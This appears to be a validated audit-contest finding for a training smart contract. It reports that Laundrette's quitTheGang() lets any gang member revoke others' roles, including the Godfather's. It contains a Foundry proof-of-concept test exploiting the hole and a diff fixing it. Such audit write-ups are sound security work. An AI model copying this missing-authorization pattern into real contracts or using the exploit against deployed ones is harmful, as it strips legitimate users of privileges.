First Flight #16: Mafia Takedown
First Flight #16
Beginner FriendlyDeFiFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

Malicious gang members can make other gang members leave the gang

0xpoor4ever

Summary

Malicious gang members can make other gang members leave the gang.

Vulnerability Details

The Laundrette::quitTheGang() function lacks isAuthorizedOrRevert modifiers, allowing malicious gang member to pass in the addresses of other gang members and revoke their gangmember role.

function quitTheGang(address account) external onlyRole("gangmember") {
kernel.revokeRole(Role.wrap("gangmember"), account);
}

malicious gang member can call the function with the Godfather's address, causing the Godfather to not only lose their gang member role but also their rightful privileges.

POC

function test_rebel() public {
address gangMember = makeAddr("gangMember");
joinGang(gangMember);
vm.prank(gangMember);
laundrette.quitTheGang(godFather);
vm.startPrank(godFather);
vm.expectRevert();
laundrette.addToTheGang(godFather);
vm.expectRevert();
laundrette.takeGuns(gangMember, 1);
vm.stopPrank();
}

Place the PoC into test/Laundrette.t.sol.t.sol, and execute with

forge test --mt test_rebel

Impact

  1. Malicious gang members can make other gang members leave the gang.

  2. malicious gang member can cause the Godfather to lose their rightful privileges.

Tools Used

Manual review, Foundry

Recommendations

Add the isAuthorizedOrRevert modifier to the quitTheGang() function.

- function quitTheGang(address account) external onlyRole("gangmember") {
+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert(account) {
kernel.revokeRole(Role.wrap("gangmember"), account);
}
Updates

Lead Judging Commences

n0kto Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Gang members ban other members

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.